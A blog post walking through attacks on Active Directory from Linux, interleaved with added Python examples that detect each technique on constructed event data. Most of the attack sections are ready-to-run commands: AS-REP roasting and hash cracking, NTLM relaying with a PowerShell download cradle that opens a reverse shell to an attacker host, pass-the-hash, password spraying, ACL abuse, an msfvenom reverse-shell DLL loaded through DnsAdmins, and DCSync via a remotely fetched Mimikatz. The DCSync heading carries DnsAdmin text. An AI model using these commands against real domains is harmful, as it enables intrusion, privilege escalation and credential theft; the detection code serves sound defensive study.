Thursday, 29 December 2022

ATTACKING ACTIVE DIRECTORY WITH LINUX

Enumerate Active Directory

From Linux we can run PowerShell modules and scripts such as PowerView. This is a great advantage when we are connected to an internal network: we avoid AV/EDR signatures and behavioural detections on the Windows hosts, as long as we are in the right Active Directory network segment.


Install Powershell on Linux


> sudo apt update && sudo apt install -y curl gnupg apt-transport-https

> curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -

> sudo sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-bullseye-prod bullseye main" > /etc/apt/sources.list.d/microsoft.list'

> sudo apt update && sudo apt install -y powershell

> pwsh

Enumerate AD with Bloodhound-python

Example:

> bloodhound-python -u kai.bel -p password1 -ns 192.168.200.129 -d cs.org -c All

Resources:

1 - https://github.com/fox-it/BloodHound.py

2 - https://github.com/BloodHoundAD/BloodHound

Search Users DCSync Rights in BloodHound


Search Users AS-REP Roastable Users (DontReqPreAuth) in BloodHound


Search Unconstrained Delegation in BloodHound




Search Shortest Paths to Domain Admins in BloodHound



Identify live hosts with crackmapexec

Example:

crackmapexec smb 192.168.200.0/24 -d cs.org


Identify live hosts with nmap

Example:

nmap -sV -p445,139 192.168.200.0/24 -vvv


In this scenario we find three devices: one DC and two workstations. Access to the shared folders is blocked.

nmap --script smb-enum-shares -p 139,445 192.168.100.0/24

nmap --script=smb-enum* --script-args=unsafe=1 -T5 192.168.100.7


Identify live hosts with nbtscan

Example:

nbtscan -r 192.168.200.0/24



AS-REP Roasting

The AS-REP Roasting attack looks for users whose account has the "Do not require Kerberos preauthentication" attribute set (DONT_REQ_PREAUTH).


Impacket GetNPUsers


Example:

/usr/bin/GetNPUsers.py cs.org/kai.bel:password1 -dc-ip 192.168.200.129 -request -format john -outputfile outputfile.txt


View the dumped hashes.


Password cracking with john

Example:

john --format=krb5asrep outputfile.txt --wordlist=/usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt
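As an added example (not part of the original post), the following Python shows the defender's side of the same attribute: it decodes the userAccountControl bit that GetNPUsers.py is looking for, and it flags the trace an AS-REP roast leaves in the domain controller's Security log, a 4768 TGT request with pre-authentication type 0 (no pre-auth), typically for an RC4 ticket (encryption type 0x17), which is the format john cracks above. The account records, the event records and the names in them (svc.backup, old.admin, the JSON-style field names) are constructed sample data, not from the lab described in the post.

```python
"""Added example (not from the original post): find accounts exposed to
AS-REP roasting and spot roasting activity in Kerberos events.

Assumptions: account records mimic the LDAP attributes sAMAccountName and
userAccountControl; event records mimic Security event 4768 fields as a
SIEM exports them to JSON. Both are constructed sample data.
"""

# userAccountControl bits: "Do not require Kerberos preauthentication"
# (DONT_REQ_PREAUTH) and "account disabled".
UF_DONT_REQUIRE_PREAUTH = 0x400000
UF_ACCOUNTDISABLE = 0x0002

# Constructed sample of LDAP account records.
ACCOUNTS = [
    {"sAMAccountName": "kai.bel", "userAccountControl": 0x10200},       # normal user
    {"sAMAccountName": "svc.backup", "userAccountControl": 0x410200},   # pre-auth not required
    {"sAMAccountName": "old.admin", "userAccountControl": 0x410202},    # pre-auth not required, but disabled
]


def roastable_accounts(records):
    """Enabled accounts with DONT_REQ_PREAUTH set: the ones an AS-REP can be
    requested for without knowing any password."""
    return [
        r["sAMAccountName"]
        for r in records
        if r["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH
        and not r["userAccountControl"] & UF_ACCOUNTDISABLE
    ]


# Event 4768 (Kerberos TGT requested). PreAuthType "0" means the request
# carried no pre-authentication; TicketEncryptionType 0x17 is RC4-HMAC, the
# type offline crackers target. Constructed sample events.
EVENTS_4768 = [
    {"EventID": 4768, "TargetUserName": "kai.bel", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "192.168.200.130"},
    {"EventID": 4768, "TargetUserName": "svc.backup", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "192.168.200.50"},
    {"EventID": 4769, "TargetUserName": "kai.bel", "PreAuthType": "-",
     "TicketEncryptionType": "0x12", "IpAddress": "192.168.200.130"},
]


def asrep_roast_alerts(events):
    """Flag TGT requests made without pre-authentication; note whether the
    ticket was RC4, which makes it cheap to crack."""
    alerts = []
    for e in events:
        if e.get("EventID") != 4768 or e.get("PreAuthType") != "0":
            continue
        alerts.append({
            "user": e["TargetUserName"],
            "source": e["IpAddress"],
            "rc4": e.get("TicketEncryptionType", "").lower() == "0x17",
        })
    return alerts


if __name__ == "__main__":
    print("roastable:", roastable_accounts(ACCOUNTS))
    print("alerts:", asrep_roast_alerts(EVENTS_4768))
```

The first function is the check to run periodically against the directory (the fix is to clear the flag on every account that does not have a documented reason for it); the second is the rule to run over DC logs, where a burst of 4768 events with PreAuthType 0 from one address is a roast in progress.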


Resources:

1-https://github.com/openwall/john

2-https://github.com/SecureAuthCorp/impacket/


SMB Signing Disabled / ntlmrelayx

This kind of attack is very dangerous because anybody with access to the network can capture traffic, relay it, and get unauthorized access to the servers.

Lateral Movement via SMB Relaying.
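The condition this section relies on is visible in the server's SMB2 NEGOTIATE response: its SecurityMode field says whether signing is merely enabled or actually required, and only "required" stops a relayed session from being accepted. As an added example (not code from the post, Responder or Impacket), the Python below builds a minimal NEGOTIATE response from constructed bytes and parses that field the way an audit tool does; the addresses are the post's lab ranges reused as sample labels and no traffic is sent. nmap's smb2-security-mode script and crackmapexec's --gen-relay-list perform the same check over the network.

```python
"""Added example (not from the original post): classify a server's SMB
signing policy from its SMB2 NEGOTIATE response. Sample responses are
constructed with build_negotiate_response(); nothing touches the network."""
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001   # set on every response
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002


def build_negotiate_response(security_mode, dialect=0x0302):
    """Build a minimal SMB2 NEGOTIATE response: the 64-byte header followed by
    the fixed part of the body (MS-SMB2 2.2.4) carrying the given SecurityMode.
    Constructed sample data standing in for what a real server sends."""
    header = struct.pack(
        "<4sHHIHHIIQIIQ16s",
        SMB2_MAGIC, 64, 0, 0, SMB2_NEGOTIATE, 1,
        SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack(
        "<HHHH16sIIIIQQHHI",
        65, security_mode, dialect, 0, b"\x11" * 16,  # StructureSize, SecurityMode, Dialect, ctx count, ServerGuid
        0x2F, 0x800000, 0x800000, 0x800000,           # Capabilities, MaxTransact/Read/Write size
        0, 0, 128, 0, 0)                              # SystemTime, ServerStartTime, SecBuf offset/len, ctx offset
    return header + body


def smb2_signing_policy(data):
    """Parse a NEGOTIATE response and report whether signing is required,
    merely enabled, or disabled. Raises ValueError for anything else."""
    if len(data) < 70:
        raise ValueError("too short for an SMB2 NEGOTIATE response")
    magic, hdr_size, _, _status, command, _, flags = struct.unpack_from("<4sHHIHHI", data, 0)
    if magic != SMB2_MAGIC or hdr_size != 64:
        raise ValueError("not an SMB2 message")
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    struct_size, security_mode, dialect = struct.unpack_from("<HHH", data, 64)
    if struct_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    if security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED:
        policy = "required"
    elif security_mode & SMB2_NEGOTIATE_SIGNING_ENABLED:
        policy = "enabled_not_required"
    else:
        policy = "disabled"
    return {"dialect": f"0x{dialect:04x}", "security_mode": security_mode,
            "signing": policy, "relay_exposed": policy != "required"}


# Constructed sample: the DC requires signing (the Windows default for domain
# controllers); the two workstations only have it enabled (the default for
# member machines), which is the state ntlmrelayx needs.
SAMPLE_RESPONSES = {
    "192.168.200.129": build_negotiate_response(0x0003),
    "192.168.200.130": build_negotiate_response(0x0001),
    "192.168.200.131": build_negotiate_response(0x0001, dialect=0x0210),
}


def relay_exposed_hosts(responses):
    """Hosts whose SMB server would accept a relayed, unsigned session."""
    return sorted(h for h, d in responses.items() if smb2_signing_policy(d)["relay_exposed"])


if __name__ == "__main__":
    for host, raw in SAMPLE_RESPONSES.items():
        print(host, smb2_signing_policy(raw))
    print("relay targets:", relay_exposed_hosts(SAMPLE_RESPONSES))
```

The mitigation is the policy "Microsoft network server: Digitally sign communications (always)" on member servers and workstations, which turns the second bit on; a host list produced by this check is exactly the target.txt the relay needs, so an empty list is the goal.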

Responder and ntlmrelayx.py (Local Admin Dumping local SAM hashes)

Example:

sudo nano /usr/share/responder/Responder.conf (set SMB = Off and HTTPS = Off)


sudo python3 /usr/share/responder/Responder.py -I eth0 -dw


sudo ln -s /usr/share/doc/python3-impacket/examples/* /usr/bi


sudo ntlmrelayx.py -tf target.txt -smb2support

Victim: the user manually enters a shared path.


Attacker: the local SAM hashes stored on the PCs 192.168.200.129 and 192.168.200.130 have been dumped.


Reverse TCP Responder and ntlmrelayx.py

sudo python3 /usr/share/responder/Responder.py -I eth0 -dw

python3 -m http.server 8080

ntlmrelayx.py -tf /home/hernan/target.txt -smb2support -c "powershell IEX(New-Object Net.WebClient).downloadString('http://192.168.1.6:8080/Invoke-PowerShellTcp.ps1')"



nc -lvp 443


Mitm6 and ntlmrelayx.py

Example:

pip install mitm6

ntlmrelayx.py -6 -wh 192.168.1.6 -tf /home/hernan/target.txt -socks -debug -smb2support





Victim:



ntlmrelayx> socks


Pass The Hash

It is a technique that allows an attacker to authenticate to a remote server or service using the underlying NTLM or LanMan hash of a user's password, rather than requesting the associated plain-text password, as is often the case.

crackmapexec

Example:

crackmapexec smb -u 'Administrador' -H '2b73e1a325df8ca7bd82063457391964' --exec-method smbexec -x whoami 192.168.200.0/24 -d cs.org



Evil-Winrm

Example:

evil-winrm -u Administrador -H '2b73e1a325df8ca7bd82063457391964' -i 192.168.200.129

Pth-Winexe

Example:

pth-winexe -U cs.org/Administrador%aad3b435b51404eeaad3b435b51404ee:2b73e1a325df8ca7bd82063457391964 //192.168.200.129 cmd.exe


Impacket

Example:

smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:2b73e1a325df8ca7bd82063457391964 cs.org/Administrador@192.168.200.129


Example:

psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2b73e1a325df8ca7bd82063457391964 cs.org/Administrador@192.168.200.129


Example:

wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2b73e1a325df8ca7bd82063457391964 cs.org/Administrador@192.168.200.129

Password Spraying

Password spraying is a technique used by an attacker to obtain valid access credentials; it consists of trying the same password against multiple users.
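Both of the last two techniques leave a distinctive shape in Windows Security events, which is what a detection engineer keys on. A spray is one source address failing against many distinct accounts in a short window (event 4625 on the target, 4771 on the DC when the attempt goes over Kerberos). A pass-the-hash sweep of a range with crackmapexec, as in the Pass The Hash section above, is one account performing NTLM network logons (event 4624, logon type 3, authentication package NTLM) to many hosts in quick succession. As an added example, not from the original post, the Python below runs both detections over constructed event records with JSON-style field names; the thresholds, timestamps, host names and addresses are assumptions.

```python
"""Added example (not from the original post): detect password spraying and
NTLM lateral-movement fan-out in Windows Security events.

Assumptions: events are dicts with the field names a SIEM typically exports
(EventID, TargetUserName, IpAddress, LogonType, AuthenticationPackageName,
Computer) plus an ISO-8601 "Time"; all records below are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta


def _ev(event_id, time, user, ip, **extra):
    """Small constructor for constructed sample events."""
    e = {"EventID": event_id, "Time": time, "TargetUserName": user, "IpAddress": ip}
    e.update(extra)
    return e


SAMPLE_EVENTS = [
    # One password tried against five accounts from one machine in 24 seconds.
    _ev(4625, "2022-12-29T10:00:00", "kai.bel", "192.168.200.50"),
    _ev(4625, "2022-12-29T10:00:05", "elle.maggee", "192.168.200.50"),
    _ev(4625, "2022-12-29T10:00:11", "lancelot.carla", "192.168.200.50"),
    _ev(4625, "2022-12-29T10:00:17", "merry.inger", "192.168.200.50"),
    _ev(4625, "2022-12-29T10:00:24", "svc.backup", "192.168.200.50"),
    # A single user mistyping a password once: should not alert.
    _ev(4625, "2022-12-29T10:03:00", "kai.bel", "192.168.200.130"),
    # The same source later authenticates as the admin, over NTLM, to three hosts.
    _ev(4624, "2022-12-29T11:00:00", "Administrador", "192.168.200.50", LogonType="3",
        AuthenticationPackageName="NTLM", Computer="DC-01"),
    _ev(4624, "2022-12-29T11:00:02", "Administrador", "192.168.200.50", LogonType="3",
        AuthenticationPackageName="NTLM", Computer="WS-01"),
    _ev(4624, "2022-12-29T11:00:04", "Administrador", "192.168.200.50", LogonType="3",
        AuthenticationPackageName="NTLM", Computer="WS-02"),
    # Ordinary Kerberos network logon by a user: should not alert.
    _ev(4624, "2022-12-29T11:05:00", "kai.bel", "192.168.200.130", LogonType="3",
        AuthenticationPackageName="Kerberos", Computer="DC-01"),
]


def _ts(s):
    return datetime.fromisoformat(s)


def _burst(items, window, key_min):
    """Given sorted (time, value) pairs, return the set of distinct values seen
    within `window` of some start event if it reaches key_min, else None."""
    items.sort()
    for i, (t0, _) in enumerate(items):
        values = {v for t, v in items[i:] if t - t0 <= window}
        if len(values) >= key_min:
            return values
    return None


def detect_password_spray(events, window=timedelta(minutes=5), min_users=5):
    """One source address, many distinct accounts failing inside the window."""
    failures = defaultdict(list)
    for e in events:
        if e.get("EventID") in (4625, 4771):
            failures[e["IpAddress"]].append((_ts(e["Time"]), e["TargetUserName"]))
    alerts = []
    for ip, items in failures.items():
        users = _burst(items, window, min_users)
        if users:
            alerts.append({"source": ip, "distinct_users": len(users)})
    return alerts


def detect_ntlm_fanout(events, window=timedelta(minutes=10), min_hosts=3):
    """One account, one source, NTLM network logons to many hosts in the window:
    the footprint of a pass-the-hash sweep (hash use never shows a Kerberos TGT)."""
    logons = defaultdict(list)
    for e in events:
        if (e.get("EventID") == 4624 and e.get("LogonType") == "3"
                and e.get("AuthenticationPackageName") == "NTLM"):
            logons[(e["TargetUserName"], e["IpAddress"])].append((_ts(e["Time"]), e["Computer"]))
    alerts = []
    for (user, ip), items in logons.items():
        hosts = _burst(items, window, min_hosts)
        if hosts:
            alerts.append({"user": user, "source": ip, "hosts": sorted(hosts)})
    return alerts


if __name__ == "__main__":
    print(detect_password_spray(SAMPLE_EVENTS))
    print(detect_ntlm_fanout(SAMPLE_EVENTS))
```

The 4624 events live on each target host, so the second rule only works once workstation and server logs are forwarded centrally; on the DC side, pass-the-hash with the built-in Administrator also stands out because that account should not be performing NTLM logons from a workstation address at all.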

crackmapexec

Password spraying SMB

Example:

crackmapexec smb 192.168.200.128 -d cs.org -u users.txt -p 'Changeme123!'

Connect remote SMB

Example:

/usr/bin/smbexec.py 'cs.org/administrador:cs2022!@192.168.200.128'

Example:

crackmapexec smb 192.168.200.128 -u 'administrador' -p 'cs2022!' -X 'ipconfig' -d cs.org


Password spraying winrm

Example:

crackmapexec winrm 192.168.200.129 -d cs.org -u /home/hernan/users.txt -p 'Changeme123!'


Connect remote winrm

Example:

evil-winrm -i 192.168.200.129 -u lancelot.carla -p Changeme123!



Resources:

1-https://github.com/Porchetta-Industries/CrackMapExec

2-https://github.com/SecureAuthCorp/impacket/

3-https://github.com/Hackplayers/evil-winrm

Abusing ACLs/ACEs

Any misconfiguration in ACL permissions can allow a standard user (with low privileges) to change settings in GPOs, add users to a specific group, change passwords, etc.



In this scenario we can see that the users of the "Marketing" group have permissions to add users to the "Project Management" group, change passwords, etc.
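The rights the Marketing group holds here are ordinary ACEs in the DACL of the "Project Management" group object (WriteProperty on the member attribute, i.e. WriteMembers), and the same kind of ACE on the domain object is what grants DCSync: the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights, which is what the BloodHound "DCSync rights" query earlier in the post searches for. As an added example (not PowerView code and not from the post), the Python below parses DACLs in SDDL form, the text form Get-Acl on the AD: drive returns, and reports control rights held by principals outside the built-in administrative groups. The schema and extended-right GUIDs are the real fixed values; the Marketing group's SID and the two DACL strings are constructed.

```python
"""Added example (not from the original post): audit an AD object's DACL
(SDDL text) for rights that let a non-admin principal take over the object.

The GUIDs are the fixed values from the AD schema. MARKETING_SID and the two
DACL strings are constructed sample data."""
import re

GUID_MEMBER_ATTR = "bf9679c0-0de6-11d0-a285-00aa003049e2"            # 'member' attribute -> WriteMembers
GUID_FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"  # User-Force-Change-Password
GUID_DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
GUID_DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"

EXTENDED_RIGHT_NAMES = {
    GUID_FORCE_CHANGE_PASSWORD: "ForceChangePassword",
    GUID_DS_REPL_GET_CHANGES: "DS-Replication-Get-Changes",
    GUID_DS_REPL_GET_CHANGES_ALL: "DS-Replication-Get-Changes-All",
}

# SDDL aliases of principals expected to hold control rights; everything else is reported.
TRUSTED = {"DA", "EA", "BA", "SY", "DD", "ED"}

# (ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
ACE_RE = re.compile(r"\((?P<type>[^;]*);(?P<flags>[^;]*);(?P<rights>[^;]*);"
                    r"(?P<object>[^;]*);(?P<inherit>[^;]*);(?P<sid>[^)]*)\)")


def parse_aces(sddl):
    """Split the ACE list of an SDDL string into dicts; rights become a set of
    two-letter SDDL codes (a raw hex mask is kept as a single string)."""
    aces = []
    for m in ACE_RE.finditer(sddl):
        ace = m.groupdict()
        r = ace["rights"]
        ace["rights"] = {r} if r.startswith("0x") else {r[i:i + 2] for i in range(0, len(r), 2)}
        ace["object"] = ace["object"].lower()
        aces.append(ace)
    return aces


def dangerous_grants(sddl, trusted=TRUSTED):
    """Allow ACEs granting takeover-class rights to principals not in `trusted`,
    as (sid, right_name) pairs in DACL order."""
    findings = []
    for ace in parse_aces(sddl):
        if ace["type"] not in ("A", "OA") or ace["sid"] in trusted:
            continue
        rights, obj, sid = ace["rights"], ace["object"], ace["sid"]
        if "GA" in rights:
            findings.append((sid, "GenericAll"))
        if "WD" in rights:
            findings.append((sid, "WriteDacl"))
        if "WO" in rights:
            findings.append((sid, "WriteOwner"))
        if "WP" in rights:
            if obj == "":
                findings.append((sid, "WriteProperty(all attributes)"))
            elif obj == GUID_MEMBER_ATTR:
                findings.append((sid, "WriteMembers"))
        if "CR" in rights:
            if obj == "":
                findings.append((sid, "AllExtendedRights"))
            elif obj in EXTENDED_RIGHT_NAMES:
                findings.append((sid, EXTENDED_RIGHT_NAMES[obj]))
    return findings


def dcsync_capable(findings):
    """Principals holding both replication rights can pull every secret via DCSync."""
    by_sid = {}
    for sid, name in findings:
        by_sid.setdefault(sid, set()).add(name)
    needed = {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"}
    return sorted(s for s, names in by_sid.items() if needed <= names)


MARKETING_SID = "S-1-5-21-1004336348-1177238915-682003330-1120"  # constructed SID for "Marketing"

# Constructed DACL of the "Project Management" group: admins have everything,
# Authenticated Users can read, and Marketing can write the member attribute.
PM_GROUP_DACL = ("O:DAG:DAD:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)(A;;RPLCLORC;;;AU)"
                 f"(OA;;WP;{GUID_MEMBER_ATTR};;{MARKETING_SID})")

# Constructed DACL of the domain object: the DC group legitimately replicates,
# but Marketing has been given the same two extended rights.
DOMAIN_DACL = ("O:DAG:DAD:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
               f"(OA;;CR;{GUID_DS_REPL_GET_CHANGES};;DD)(OA;;CR;{GUID_DS_REPL_GET_CHANGES_ALL};;DD)"
               f"(OA;;CR;{GUID_DS_REPL_GET_CHANGES};;{MARKETING_SID})"
               f"(OA;;CR;{GUID_DS_REPL_GET_CHANGES_ALL};;{MARKETING_SID})")

if __name__ == "__main__":
    print("Project Management:", dangerous_grants(PM_GROUP_DACL))
    domain = dangerous_grants(DOMAIN_DACL)
    print("Domain:", domain, "DCSync-capable:", dcsync_capable(domain))
```

In a real audit the trusted set should also contain the SIDs of any tier-0 service accounts with a documented reason for the right (a directory synchronisation account is the usual one); everything else the function prints is an edge BloodHound will draw.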

Changing passwords:

$Pass = ConvertTo-SecureString 'P@ssw0d!' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('cs.org\merry.inger', $Pass)

Adding an ACE to a group:

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Domain Admins" -Rights WriteMembers

PS: this proof of concept can be done with PowerView (I omit the image).

DnsAdmin

For the attack to work, you must have compromised an account that is a member of the DnsAdmins group or that has write privileges on a DNS server object. The attack vector consists of injecting a malicious DLL into the DNS service process, which runs as SYSTEM, so that the DLL is loaded with SYSTEM privileges when the service is restarted (privilege escalation).

Example:

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.1.6 LPORT=80 -f dll > dns.dll

dnscmd.exe DC-01 /config /serverlevelplugindll C:\Users\kai.bel\Documents\dns.dll

sc.exe stop dns

sc.exe start dns


PS: for the exploitation you must have local administrator privileges or service-management permissions on the DNS server (to restart the DNS service).

DCSync

Abuse in AD where a user who is a member of the DnsAdmins group or has write privileges to a DNS server object can load an arbitrary DLL with SYSTEM privileges on the DNS server.

Mimikatz

Example:

IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.6/Invoke-Mimikatz.ps1');

Invoke-Mimikatz -Command '"lsadump::dcsync /domain:cs.org /user:Administrador"'



Impacket

Example:

secretsdump.py cs.org/elle.maggee:password@192.168.200.129 -just-dc

secretsdump.py cs.org/elle.maggee:password@192.168.200.129 -just-dc-user krbtgt
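Both of the last two techniques, the DnsAdmin DLL and DCSync, produce an auditable event on the server they abuse. DCSync works by asking the DC to replicate directory data as another DC would, so it appears in Security event 4662 on the DC as a control-access operation on the domain object whose Properties list the replication extended-right GUIDs, requested by an account that is not a domain controller (this needs "Audit Directory Service Access" and the default SACL on the domain object). Setting ServerLevelPluginDll with dnscmd appears as a registry value written under Services\DNS\Parameters: Security event 4657 if that key carries a SACL, or Sysmon event 13 where Sysmon is deployed. As an added example, not from the post, the Python below implements both checks over constructed event records; the DC account allow-list, user names and DLL paths are assumptions.

```python
"""Added example (not from the original post): detect DCSync (event 4662) and
ServerLevelPluginDll registry changes (event 4657 / Sysmon 13).

The replication GUIDs are the real extended-right values; every event record,
account name and path below is constructed sample data."""

REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
DNS_PLUGIN_VALUE = "serverlevelplugindll"
DNS_PARAMETERS_KEY = "\\services\\dns\\parameters"


def detect_dcsync(events, dc_accounts):
    """4662 events whose Properties carry a replication GUID, requested by an
    account outside `dc_accounts` (the DCs' machine accounts, which replicate
    with each other legitimately)."""
    alerts = []
    for e in events:
        if e.get("EventID") != 4662:
            continue
        props = e.get("Properties", "").lower()
        hit = [name for guid, name in REPLICATION_GUIDS.items() if guid in props]
        if not hit:
            continue
        subject = e.get("SubjectUserName", "")
        if subject.upper() in {a.upper() for a in dc_accounts}:
            continue
        alerts.append({"user": subject, "rights": hit})
    return alerts


def detect_dns_plugin_dll(events):
    """Registry writes of the DNS service's ServerLevelPluginDll value, from
    either Security event 4657 or Sysmon event 13 field layouts."""
    alerts = []
    for e in events:
        eid = e.get("EventID")
        if (eid == 4657 and e.get("ObjectValueName", "").lower() == DNS_PLUGIN_VALUE
                and DNS_PARAMETERS_KEY in e.get("ObjectName", "").lower()):
            alerts.append({"user": e.get("SubjectUserName"), "dll": e.get("NewValue"), "via": "4657"})
        elif (eid == 13 and e.get("TargetObject", "").lower()
              .endswith(DNS_PARAMETERS_KEY + "\\" + DNS_PLUGIN_VALUE)):
            alerts.append({"user": e.get("User"), "dll": e.get("Details"), "via": "sysmon13"})
    return alerts


# Constructed sample events.
SAMPLE_EVENTS = [
    # Normal DC-to-DC replication: must not alert.
    {"EventID": 4662, "SubjectUserName": "DC-02$", "ObjectType": "domainDNS", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A user account requesting replication: DCSync.
    {"EventID": 4662, "SubjectUserName": "elle.maggee", "ObjectType": "domainDNS", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Unrelated 4662 on a user object (a non-replication property GUID): must not alert.
    {"EventID": 4662, "SubjectUserName": "kai.bel", "ObjectType": "user", "AccessMask": "0x10",
     "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},
    # The dnscmd /config /serverlevelplugindll write, seen two ways.
    {"EventID": 4657, "SubjectUserName": "kai.bel",
     "ObjectName": "\\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters",
     "ObjectValueName": "ServerLevelPluginDll", "NewValue": "C:\\Users\\kai.bel\\Documents\\dns.dll"},
    {"EventID": 13, "User": "CS\\kai.bel",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\DNS\\Parameters\\ServerLevelPluginDll",
     "Details": "C:\\Users\\kai.bel\\Documents\\dns.dll"},
]

if __name__ == "__main__":
    print(detect_dcsync(SAMPLE_EVENTS, {"DC-01$", "DC-02$"}))
    print(detect_dns_plugin_dll(SAMPLE_EVENTS))
```

Any non-empty ServerLevelPluginDll value is worth an alert, not only unusual paths: the value is empty on a healthy DNS server, and the only legitimate way it becomes set is a deliberate administrative change that should be known in advance.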




! Thank you very much !


